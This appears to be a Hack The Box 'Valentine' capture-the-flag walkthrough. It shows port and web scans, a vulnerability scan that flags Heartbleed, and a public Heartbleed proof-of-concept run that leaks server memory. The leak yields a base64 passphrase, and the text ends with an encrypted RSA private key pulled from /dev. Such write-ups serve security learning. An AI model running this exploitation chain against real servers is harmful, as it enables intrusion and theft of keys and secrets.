Pages

Search

HTB Valentine

$ sudo nmap -T4 -A -p- 10.10.10.79

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 10:36 CEST
Nmap scan report for 10.10.10.79
Host is up (0.051s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2020-08-25T08:38:41+00:00; 0s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/25%OT=22%CT=1%CU=37879%PV=Y%DS=2%DC=T%G=Y%TM=5F44CE1
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=8)OPS
OS:(O1=M54DST11NW4%O2=M54DST11NW4%O3=M54DNNT11NW4%O4=M54DST11NW4%O5=M54DST1
OS:1NW4%O6=M54DST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)ECN
OS:(R=Y%DF=Y%T=40%W=3908%O=M54DNNSNW4%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M54DST11NW4%RD=
OS:0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%R
OS:IPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   43.60 ms 10.10.14.1
2   43.58 ms 10.10.10.79

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.31 seconds

$ gobuster dir -u https://10.10.10.79 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -k

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.79
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/08/25 10:38:44 Starting gobuster
===============================================================
https://10.10.10.79/index (Status: 200)
https://10.10.10.79/dev (Status: 301)
https://10.10.10.79/encode (Status: 200)
https://10.10.10.79/decode (Status: 200)
https://10.10.10.79/omg (Status: 200)
https://10.10.10.79/server-status (Status: 403)
===============================================================
2020/08/25 10:58:50 Finished
===============================================================

$ nikto -h 10.10.10.79

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.79
+ Target Hostname:    10.10.10.79
+ Target Port:        80
+ Start Time:         2020-08-25 10:40:29 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /dev/: Directory indexing found.
+ OSVDB-3092: /dev/: This might be interesting...
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 534222, size: 5108, mtime: Tue Aug 28 12:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8673 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2020-08-25 10:48:47 (GMT2) (498 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$ sudo nmap --script vuln -p 80 10.10.10.79

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 15:51 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.79
Host is up (0.061s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 56.41 seconds

$ sudo nmap --script vuln -p 443 10.10.10.79

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-25 15:52 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.79
Host is up (0.047s latency).

PORT    STATE SERVICE
443/tcp open  https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
|_  /index/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| ssl-ccs-injection: 
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
|       does not properly restrict processing of ChangeCipherSpec messages,
|       which allows man-in-the-middle attackers to trigger use of a zero
|       length master key in certain OpenSSL-to-OpenSSL communications, and
|       consequently hijack sessions or obtain sensitive information, via
|       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140605.txt
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|_      http://www.cvedetails.com/cve/2014-0224
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt 
|       http://cvedetails.com/cve/2014-0160/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.openssl.org/~bodo/ssl-poodle.pdf
|_sslv2-drown: 

Nmap done: 1 IP address (1 host up) scanned in 58.94 seconds

Based on these results, this box is Heartbleed vulnerable.

https://github.com/sensepost/heartbleed-poc

$ python heartbleed-poc.py 10.10.10.79

Scanning 10.10.10.79 on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 885
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2

Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 30 2E 30 2E  ....#.......0.0.
  00e0: 31 2F 64 65 63 6F 64 65 2E 70 68 70 0D 0A 43 6F  1/decode.php..Co
  00f0: 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C  ntent-Type: appl
  0100: 69 63 61 74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F  ication/x-www-fo
  0110: 72 6D 2D 75 72 6C 65 6E 63 6F 64 65 64 0D 0A 43  rm-urlencoded..C
  0120: 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34  ontent-Length: 4
  0130: 32 0D 0A 0D 0A 24 74 65 78 74 3D 61 47 56 68 63  2....$text=aGVhc
  0140: 6E 52 69 62 47 56 6C 5A 47 4A 6C 62 47 6C 6C 64  nRibGVlZGJlbGlld
  0150: 6D 56 30 61 47 56 6F 65 58 42 6C 43 67 3D 3D E4  mV0aGVoeXBlCg==.
  0160: 59 DD C9 6D C0 F0 09 01 1C BA BB 8A A4 DF 9B 3D  Y..m...........=
  0170: EF E9 C6 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C  ................
  0180: 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A  .User-Agent: Moz
  0190: 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 61 74  illa/5.0 (compat
  01a0: 69 62 6C 65 3B 20 4E 6D 61 70 20 53 63 72 69 70  ible; Nmap Scrip
  01b0: 74 69 6E 67 20 45 6E 67 69 6E 65 3B 20 68 74 74  ting Engine; htt
  01c0: 70 73 3A 2F 2F 6E 6D 61 70 2E 6F 72 67 2F 62 6F  ps://nmap.org/bo
  01d0: 6F 6B 2F 6E 73 65 2E 68 74 6D 6C 29 0D 0A 48 6F  ok/nse.html)..Ho
  01e0: 73 74 3A 20 31 30 2E 31 30 2E 31 30 2E 37 39 0D  st: 10.10.10.79.
  01f0: 0A 0D 0A 47 45 54 20 2F 69 6E 63 6F 6D 69 6E 67  ...GET /incoming
  0200: 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 43 6F 6E 6E  / HTTP/1.1..Conn
  0210: 65 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69  ection: keep-ali
  0220: 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20  ve..User-Agent: 
  0230: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D  Mozilla/5.0 (com
  0240: 70 61 74 69 62 6C 65 3B 20 4E 6D 61 70 20 53 63  patible; Nmap Sc
  0250: 72 69 70 74 69 6E 67 20 45 6E 67 69 6E 65 3B 20  ripting Engine; 
  0260: 68 74 74 70 73 3A 2F 2F 6E 6D 61 70 2E 6F 72 67  https://nmap.org
  0270: 2F 62 6F 6F 6B 2F 6E 73 65 2E 68 74 6D 6C 29 0D  /book/nse.html).
  0280: 0A 48 6F 73 74 3A 20 31 30 2E 31 30 2E 31 30 2E  .Host: 10.10.10.
  0290: 37 39 0D 0A 0D 0A 47 45 54 20 2F 69 6E 64 65 78  79....GET /index
  02a0: 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 43 6F 6E 6E  / HTTP/1.1..Conn
  02b0: 65 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69  ection: keep-ali
  02c0: 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20  ve..User-Agent: 
  02d0: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D  Mozilla/5.0 (com
  02e0: 70 61 74 69 62 6C 65 3B 20 4E 6D 61 70 20 53 63  patible; Nmap Sc
  02f0: 72 69 70 74 69 6E 67 20 45 6E 67 69 6E 65 3B 20  ripting Engine; 
  0300: 68 74 74 70 73 3A 2F 2F 6E 6D 61 70 2E 6F 72 67  https://nmap.org
  0310: 2F 62 6F 6F 6B 2F 6E 73 65 2E 68 74 6D 6C 29 0D  /book/nse.html).
  0320: 0A 48 6F 73 74 3A 20 31 30 2E 31 30 2E 31 30 2E  .Host: 10.10.10.
  0330: 37 39 0D 0A 0D 0A 47 45 54 20 2F 69 6E 65 74 2F  79....GET /inet/
  0340: 20 48 54 54 50 2F 31 2E 31 0D 0A 43 6F 6E 6E 65   HTTP/1.1..Conne
  0350: 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76  ction: keep-aliv
  0360: 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D  e..User-Agent: M
  0370: 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70  ozilla/5.0 (comp
  0380: 61 74 69 62 6C 65 3B 20 4E 6D 61 70 20 53 63 72  atible; Nmap Scr
  0390: 69 70 74 69 6E 67 20 45 6E 67 69 6E 65 3B 20 68  ipting Engine; h
  03a0: 74 74 70 73 3A 2F 2F 6E 6D 61 70 2E 6F 72 67 2F  ttps://nmap.org/
  03b0: 62 6F 6F 6B 2F 6E 73 65 2E 68 74 6D 6C 29 0D 0A  book/nse.html)..
  03c0: 48 6F 73 74 3A 20 31 30 2E 31 30 2E 31 30 2E 37  Host: 10.10.10.7
  03d0: 39 0D 0A 0D 0A 47 45 54 20 2F 69 6E 66 2F 20 48  9....GET /inf/ H
  03e0: 54 54 50 2F 31 2E 31 0D 0A 43 6F 6E 6E 65 63 74  TTP/1.1..Connect
  03f0: 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D  ion: keep-alive.
  0400: 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A  .User-Agent: Moz
  0410: 69 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 61 74  illa/5.0 (compat
  0420: 69 62 6C 65 3B 20 4E 6D 61 70 20 53 63 72 69 70  ible; Nmap Scrip
  0430: 74 69 6E 67 20 45 6E 67 69 6E 65 3B 20 68 74 74  ting Engine; htt
  0440: 70 73 3A 2F 2F 6E 6D 61 70 2E 6F 72 67 2F 62 6F  ps://nmap.org/bo
  0450: 6F 6B 2F 6E 73 65 2E 68 74 6D 6C 29 0D 0A 48 6F  ok/nse.html)..Ho
  0460: 73 74 3A 20 31 30 2E 31 30 2E 31 30 2E 37 39 0D  st: 10.10.10.79.
  0470: 0A 0D 0A 47 45 54 20 2F 69 6E 66 6F 2F 20 48 54  ...GET /info/ HT
  0480: 54 50 2F 31 2E 31 0D 0A 43 6F 6E 6E 65 63 74 69  TP/1.1..Connecti
  0490: 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65 0D 0A  on: keep-alive..
  04a0: 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69  User-Agent: Mozi
  04b0: 6C 6C 61 2F 35 2E 30 20 28 63 6F 6D 70 61 74 69  lla/5.0 (compati
  04c0: 62 6C 65 3B 20 4E 6D 61 70 20 53 63 72 69 70 74  ble; Nmap Script
  04d0: 69 6E 67 20 45 6E 67 69 6E 65 3B 20 68 74 74 70  ing Engine; http
  04e0: 73 3A 2F 2F 6E 6D 61 70 2E 6F 72 67 2F 62 6F 6F  s://nmap.org/boo
  04f0: 6B 2F 6E 73 65 2E 68 74 6D 6C 29 0D 0A 48 6F 73  k/nse.html)..Hos
  0500: 74 3A 20 31 30 2E 31 30 2E 31 30 2E 37 39 0D 0A  t: 10.10.10.79..
  0510: 0D 0A 47 45 54 20 2F 69 6E 66 6F 72 6D 61 74 69  ..GET /informati
  0520: 6F 6E 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 43 6F  on/ HTTP/1.1..Co
  0530: 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61  nnection: keep-a
  0540: 6C 69 76 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74  live..User-Agent
  0550: 3A 20 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 63  : Mozilla/5.0 (c
  0560: 6F 6D 70 61 74 69 62 6C 65 3B 20 4E 6D 61 70 20  ompatible; Nmap 
  0570: 53 63 72 69 70 74 69 6E 67 20 45 6E 67 69 6E 65  Scripting Engine
  0580: 3B 20 68 74 74 70 73 3A 2F 2F 6E 6D 61 70 2E 6F  ; https://nmap.o
  0590: 72 67 2F 62 6F 6F 6B 2F 6E 73 65 2E 68 74 6D 6C  rg/book/nse.html
  05a0: 29 0D 0A 48 6F 73 74 3A 20 31 30 2E 31 30 2E 31  )..Host: 10.10.1
  05b0: 30 2E 37 39 0D 0A 0D 0A 47 45 54 20 2F 69 6E 2F  0.79....GET /in/

....

WARNING: server 10.10.10.79 returned more data than it should - server is vulnerable!

$ strings dump.bin

0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: 10.10.10.79
GET /incoming/ HTTP/1.1
Connection: keep-alive
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: 10.10.10.79
GET /index/ HTTP/1.1
Connection: keep-alive
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: 10.10.10.79
GET /inet/ HTTP/1.1
Connection: keep-alive
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Host: 10.10.10.79
...

Using https://www.base64decode.org/

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
heartbleedbelievethehype

Access to https://10.10.10.79/dev

https://10.10.10.79/dev/notes.txt

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

https://10.10.10.79/dev/hype_key

2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d 0d 0a 50 72 6f 63 2d 54 79 70 65 3a 20 34 2c 45 4e 43 52 59 50 54 45 44 0d 0a 44 45 4b 2d 49 6e 66 6f 3a 20 41 45 53 2d 31 32 38 2d 43 42 43 2c 41 45 42 38 38 43 31 34 30 46 36 39 42 46 32 30 37 34 37 38 38 44 45 32 34 41 45 34 38 44 34 36 0d 0a 0d 0a 44 62 50 72 4f 37 38 6b 65 67 4e 75 6b 31 44 41 71 6c 41 4e 35 6a 62 6a 58 76 30 50 50 73 6f 67 33 6a 64 62 4d 46 53 38 69 45 39 70 33 55 4f 4c 30 6c 46 30 78 66 37 50 7a 6d 72 6b 44 61 38 52 0d 0a 35 79 2f 62 34 36 2b 39 6e 45 70 43 4d 66 54 50 68 4e 75 4a 52 63 57 32 55 32 67 4a 63 4f 46 48 2b 39 52 4a 44 42 43 35 55 4a 4d 55 53 31 2f 67 6a 42 2f 37 2f 4d 79 30 30 4d 77 78 2b 61 49 36 0d 0a 30 45 49 30 53 62 4f 59 55 41 56 31 57 34 45 56 37 6d 39 36 51 73 5a 6a 72 77 4a 76 6e 6a 56 61 66 6d 36 56 73 4b 61 54 50 42 48 70 75 67 63 41 53 76 4d 71 7a 37 36 57 36 61 62 52 5a 65 58 69 0d 0a 45 62 77 36 36 68 6a 46 6d 41 75 34 41 7a 71 63 4d 2f 6b 69 67 4e 52 46 50 59 75 4e 69 58 72 58 73 31 77 2f 64 65 4c 43 71 43 4a 2b 45 61 31 54 38 7a 6c 61 73 36 66 63 6d 68 4d 38 41 2b 38 50 0d 0a 4f 58 42 4b 4e 65 36 6c 31 37 68 4b 61 54 36 77 46 6e 70 35 65 58 4f 61 55 49 48 76 48 6e 76 4f 36 53 63 48 56 57 52 72 5a 37 30 66 63 70 63 70 69 6d 4c 31 77 31 33 54 67 64 64 32 41 69 47 64 0d 0a 70 48 4c 4a 70 59 55 49 49 35 50 75 4f 36 78 2b 4c 53 38 6e 31 72 2f 47 57 4d 71 53 4f 45 69 6d 4e 52 44 31 6a 2f 35 39 2f 34 75 33 52 4f 72 54 43 4b 65 6f 39 44 73 54 52 71 73 32 6b 31 53 48 0d 0a 51 64 57 77 46 77 61 58 62 59 79 54 31 75 78 41 4d 53 6c 35 48 71 39 4f 44 35 48 4a 38 47 30 52 36 4a 49 35 52 76 43 4e 55 51 6a 77 78 30 46 49 54 6a 6a 4d 6a 6e 4c 49 70 78 6a 76 66 71 2b 45 0d 0a 70 30 67 44 30 55 63 79 6c 4b 6d 36 72 43 5a 71 61 63 77 6e 53 64 64 48 57 38 57 33 4c 78 4a 6d 43 78 64 78 57 35 6c 74 35 64 50 6a 41 6b 42 59 52 55 6e 6c 39 31 45 53 43 69 44 34 5a 2b 75 43 0d 0a 4f 6c 36 6a 4c 46 44 32 6b 61 4f 4c 66 75 79 65 65 30 66 59 43 62 37 47 54 71 4f 65 37 45 6d 4d 42 33 66 47 49 77 53 64 57 38 4f 43 38 4e 57 54 6b 77 70 6a 63 30 45 4c 62 6c 55 61 36 75 6c 4f 0d 0a 74 39 67 72 53 6f 73 52 54 43 73 5a 64 31 34 4f 50 74 73 34 62 4c 73 70 4b 78 4d 4d 4f 73 67 6e 4b 6c 6f 58 76 6e 6c 50 4f 53 77 53 70 57 79 39 57 70 36 79 38 58 58 38 2b 46 34 30 72 78 6c 35 0d 0a 58 71 68 44 55 42 68 79 6b 31 43 33 59 50 4f 69 44 75 50 4f 6e 4d 58 61 49 70 65 31 64 67 62 30 4e 64 44 31 4d 39 5a 51 53 4e 55 4c 77 31 44 48 43 47 50 50 34 4a 53 53 78 58 37 42 57 64 44 4b 0d 0a 61 41 6e 57 4a 76 46 67 6c 41 34 6f 46 42 42 56 41 38 75 41 50 4d 66 56 32 58 46 51 6e 6a 77 55 54 35 62 50 4c 43 36 35 74 46 73 74 6f 52 74 54 5a 31 75 53 72 75 61 69 32 37 6b 78 54 6e 4c 51 0d 0a 2b 77 51 38 37 6c 4d 61 64 64 73 31 47 51 4e 65 47 73 4b 53 66 38 52 2f 72 73 52 4b 65 65 4b 63 69 6c 44 65 50 43 6a 65 61 4c 71 74 71 78 6e 68 4e 6f 46 74 67 30 4d 78 74 36 72 32 67 62 31 45 0d 0a 41 6c 6f 51 36 6a 67 35 54 62 6a 35 4a 37 71 75 59 58 5a 50 79 6c 42 6c 6a 4e 70 39 47 56 70 69 6e 50 63 33 4b 70 48 74 74 76 67 62 70 74 66 69 57 45 45 73 5a 59 6e 35 79 5a 50 68 55 72 39 51 0d 0a 72 30 38 70 6b 4f 78 41 72 58 45 32 64 6a 37 65 58 2b 62 71 36 35 36 33 35 4f 4a 36 54 71 48 62 41 6c 54 51 31 52 73 39 50 75 6c 72 53 37 4b 34 53 4c 58 37 6e 59 38 39 2f 52 5a 35 6f 53 51 65 0d 0a 32 56 57 52 79 54 5a 31 46 66 6e 67 4a 53 73 76 39 2b 4d 66 76 7a 33 34 31 6c 62 7a 4f 49 57 6d 6b 37 57 66 45 63 57 63 48 63 31 36 6e 39 56 30 49 62 53 4e 41 4c 6e 6a 54 68 76 45 63 50 6b 79 0d 0a 65 31 42 73 66 53 62 73 66 39 46 67 75 55 5a 6b 67 48 41 6e 6e 66 52 4b 6b 47 56 47 31 4f 56 79 75 77 63 2f 4c 56 6a 6d 62 68 5a 7a 4b 77 4c 68 61 5a 52 4e 64 38 48 45 4d 38 36 66 4e 6f 6a 50 0d 0a 30 39 6e 56 6a 54 61 59 74 57 55 58 6b 30 53 69 31 57 30 32 77 62 75 31 4e 7a 4c 2b 31 54 67 39 49 70 4e 79 49 53 46 43 46 59 6a 53 71 69 79 47 2b 57 55 37 49 77 4b 33 59 55 35 6b 70 33 43 43 0d 0a 64 59 53 63 7a 36 33 51 32 70 51 61 66 78 66 53 62 75 76 34 43 4d 6e 4e 70 64 69 72 56 4b 45 6f 35 6e 52 52 66 4b 2f 69 61 4c 33 58 31 52 33 44 78 56 38 65 53 59 46 4b 46 4c 36 70 71 70 75 58 0d 0a 63 59 35 59 5a 4a 47 41 70 2b 4a 78 73 6e 49 51 39 43 46 79 78 49 74 39 32 66 72 58 7a 6e 73 6a 68 6c 59 61 38 73 76 62 56 4e 4e 66 6b 2f 39 66 79 58 36 6f 70 32 34 72 4c 32 44 79 45 53 70 59 0d 0a 70 6e 73 75 6b 42 43 46 42 6b 5a 48 57 4e 4e 79 65 4e 37 62 35 47 68 54 56 43 6f 64 48 68 7a 48 56 46 65 68 54 75 42 72 70 2b 56 75 50 71 61 71 44 76 4d 43 56 65 31 44 5a 43 62 34 4d 6a 41 6a 0d 0a 4d 73 6c 66 2b 39 78 4b 2b 54 58 45 4c 33 69 63 6d 49 4f 42 52 64 50 79 77 36 65 2f 4a 6c 51 6c 56 52 6c 6d 53 68 46 70 49 38 65 62 2f 38 56 73 54 79 4a 53 65 2b 62 38 35 33 7a 75 56 32 71 4c 0d 0a 73 75 4c 61 42 4d 78 59 4b 6d 33 2b 7a 45 44 49 44 76 65 4b 50 4e 61 61 57 5a 67 45 63 71 78 79 6c 43 43 2f 77 55 79 55 58 6c 4d 4a 35 30 4e 77 36 4a 4e 56 4d 4d 38 4c 65 43 69 69 33 4f 45 57 0d 0a 6c 30 6c 6e 39 4c 31 62 2f 4e 58 70 48 6a 47 61 38 57 48 48 54 6a 6f 49 69 6c 42 35 71 4e 55 79 79 77 53 65 54 42 46 32 61 77 52 6c 58 48 39 42 72 6b 5a 47 34 46 63 34 67 64 6d 57 2f 49 7a 54 0d 0a 52 55 67 5a 6b 62 4d 51 5a 4e 49 49 66 7a 6a 31 51 75 69 6c 52 56 42 6d 2f 46 37 36 59 2f 59 4d 72 6d 6e 4d 39 6b 2f 31 78 53 47 49 73 6b 77 43 55 51 2b 39 35 43 47 48 4a 45 38 4d 6b 68 44 33 0d 0a 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 50 52 49 56 41 54 45 20 4b 45 59 2d 2d 2d 2d 2d

